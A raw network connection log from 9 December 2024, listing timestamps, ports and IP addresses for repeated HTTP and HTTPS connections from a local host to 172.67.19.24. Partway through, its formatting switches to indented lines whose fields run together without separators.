Dec 9, 2024 14:12:39.626035929 CET | 49704 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:39.626104116 CET | 49760 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:39.626308918 CET | 49760 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:39.745912075 CET | 80 | 49760 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.733129025 CET | 80 | 49760 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.734461069 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.734515905 CET | 443 | 49764 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.734601974 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.734874964 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.734889984 CET | 443 | 49764 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.737926006 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.740523100 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.783344984 CET | 443 | 49764 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.786601067 CET | 49760 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.859816074 CET | 80 | 49765 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:40.859890938 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.860016108 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:40.979269981 CET | 80 | 49765 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:41.946403027 CET | 443 | 49764 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:41.946527004 CET | 443 | 49764 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:41.946657896 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:41.951138020 CET | 49764 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:41.956856966 CET | 80 | 49765 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:41.958260059 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:41.958297968 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:41.958390951 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:41.958764076 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:41.958776951 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:42.005357027 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:43.170602083 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.170730114 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:43.174676895 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:43.174685001 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.175102949 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.195729971 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:43.239327908 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.808455944 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.808562994 CET | 443 | 49769 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:43.808629990 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:43.809176922 CET | 49769 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:48.818711996 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:48.819469929 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:48.940514088 CET | 80 | 49765 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:48.940562010 CET | 80 | 49787 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:48.940694094 CET | 49765 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:48.940752029 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:48.940943956 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:49.062139988 CET | 80 | 49787 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:50.116533995 CET | 80 | 49787 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:50.117472887 CET | 49789 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.117539883 CET | 443 | 49789 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:50.117592096 CET | 49789 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.120892048 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.161633015 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.240370989 CET | 80 | 49790 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:50.240497112 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.240664959 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:50.359983921 CET | 80 | 49790 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:51.354226112 CET | 80 | 49790 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:51.355218887 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:51.355249882 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:51.355330944 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:51.355551958 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:51.355565071 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:51.395999908 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:52.566220999 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:52.567933083 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:52.567945004 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:53.020562887 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:53.020656109 CET | 443 | 49795 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:53.020714045 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:53.021158934 CET | 49795 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.037354946 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.037430048 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.038089037 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.160094023 CET | 80 | 49787 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:58.160188913 CET | 80 | 49812 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:58.160340071 CET | 49787 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.160394907 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.160403967 CET | 80 | 49790 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:58.160458088 CET | 49790 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.160624981 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:58.280018091 CET | 80 | 49812 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:59.290079117 CET | 80 | 49812 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:59.291364908 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:59.333484888 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:59.410690069 CET | 80 | 49815 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:12:59.410800934 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:59.410897970 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:12:59.530153036 CET | 80 | 49815 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:00.523938894 CET | 80 | 49815 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:00.525068045 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:00.525110006 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:00.525178909 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:00.525422096 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:00.525435925 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:00.567851067 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:01.758444071 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:01.768342018 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:01.768373966 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:02.207564116 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:02.207654953 CET | 443 | 49819 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:02.207712889 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:02.217478037 CET | 49819 | 443 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.228652954 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.230788946 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.231262922 CET | 49836 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.348534107 CET | 80 | 49815 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:07.348592043 CET | 49815 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.350548029 CET | 80 | 49812 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:07.350601912 CET | 49812 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.350640059 CET | 80 | 49836 | 172.67.19.24 | 192.168.2.5
Dec 9, 2024 14:13:07.350704908 CET | 49836 | 80 | 192.168.2.5 | 172.67.19.24
Dec 9, 2024 14:13:07.350838900 CET | 49836 | 80 | 192.168.2.5 | 172.67.19.24
                                                            Dec 9, 2024 14:13:07.471275091 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.560107946 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.561382055 CET49839443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.561428070 CET44349839172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.561490059 CET49839443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.562458992 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.614808083 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.681854963 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:08.681945086 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.682054043 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:08.801357031 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.794367075 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.795490980 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795541048 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.795608044 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795841932 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:09.795847893 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:09.849147081 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.006453991 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.008003950 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.008033991 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467642069 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467750072 CET44349844172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:11.467816114 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:11.468195915 CET49844443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.474561930 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.474657059 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.475445032 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594732046 CET8049836172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594786882 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594810009 CET4983680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594855070 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.594899893 CET8049840172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:16.594949961 CET4984080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.595082998 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:16.715213060 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.705460072 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.708079100 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.708138943 CET44349865172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.708203077 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.708256006 CET49865443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.715667009 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.755356073 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.835078001 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:17.835324049 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.835493088 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:17.954787970 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:18.956958055 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:18.957966089 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958014011 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:18.958108902 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958340883 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:18.958350897 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:19.005414009 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.169433117 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.171540976 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.171569109 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624151945 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624270916 CET44349869172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:20.624324083 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:20.624831915 CET49869443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631059885 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631211042 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.631917953 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.750766993 CET8049861172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751074076 CET4986180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751200914 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751213074 CET8049866172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:25.751281023 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751298904 CET4986680192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.751452923 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:25.870702982 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.862850904 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.864495993 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.864550114 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.864618063 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.865489960 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.865510941 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.867038012 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.876905918 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.911341906 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.911680937 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:26.996351004 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:26.996488094 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:27.066998959 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:27.186348915 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.077914953 CET44349889172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.077994108 CET49889443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.121633053 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.122627974 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.122664928 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.122721910 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.123054981 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:28.123068094 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:28.161659956 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.333914995 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.334009886 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.335423946 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.335441113 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.335695982 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.337162018 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.383341074 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787369967 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787465096 CET44349894172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:29.787545919 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:29.792826891 CET49894443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.803478956 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.803930998 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.804466009 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.923378944 CET8049890172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.923444986 CET4989080192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.923764944 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.923835993 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.924084902 CET8049885172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:34.924129963 CET4988580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:34.925534964 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:35.044843912 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.073672056 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.074651957 CET49914443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.074711084 CET44349914172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.074832916 CET49914443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.074995041 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.075005054 CET44349914104.20.4.235192.168.2.5
                                                            Dec 9, 2024 14:13:36.075067997 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.076056004 CET49914443192.168.2.5104.20.4.235
                                                            Dec 9, 2024 14:13:36.076062918 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.117240906 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.196094990 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:36.196234941 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.196400881 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:36.315808058 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.294008017 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.295330048 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295377970 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.295439005 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295741081 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:37.295753002 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:37.349148035 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:38.506788969 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.509308100 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:38.509340048 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.962848902 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.962973118 CET44349919172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:38.963036060 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:39.027694941 CET49919443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.037214994 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.037223101 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.038141012 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.156959057 CET8049911172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157068968 CET4991180192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.157650948 CET8049915172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157727957 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:44.157814026 CET4991580192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.157816887 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.159759998 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:44.279073000 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.273494959 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.274640083 CET49937443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.274691105 CET44349937172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.274772882 CET49937443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.275693893 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.394968033 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:45.395054102 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.395200014 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.411647081 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:45.514421940 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.809268951 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.811350107 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.811397076 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.811464071 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.811997890 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.812014103 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.911653042 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:46.921603918 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:46.921704054 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.027384996 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.031265974 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.031305075 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.479868889 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.479980946 CET44349942172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:48.483411074 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:48.487262011 CET49942443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.501411915 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.621165991 CET8049938172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.621272087 CET4993880192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.622653008 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.651460886 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.742752075 CET8049934172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.742805958 CET4993480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.771140099 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:53.771207094 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.789258957 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:53.909060001 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.860887051 CET8049959172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.862298012 CET49963443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.862366915 CET44349963172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.862430096 CET49963443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.863539934 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.927268028 CET4995980192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.982990026 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:54.983721018 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:54.984843016 CET4996480192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:55.104118109 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.079979897 CET8049964172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.099564075 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:56.099639893 CET44349968172.67.19.24192.168.2.5
                                                            Dec 9, 2024 14:13:56.099937916 CET49968443192.168.2.5172.67.19.24
                                                            Dec 9, 2024 14:13:56.100287914 CET49968443192.168.2.5172.67.19.24
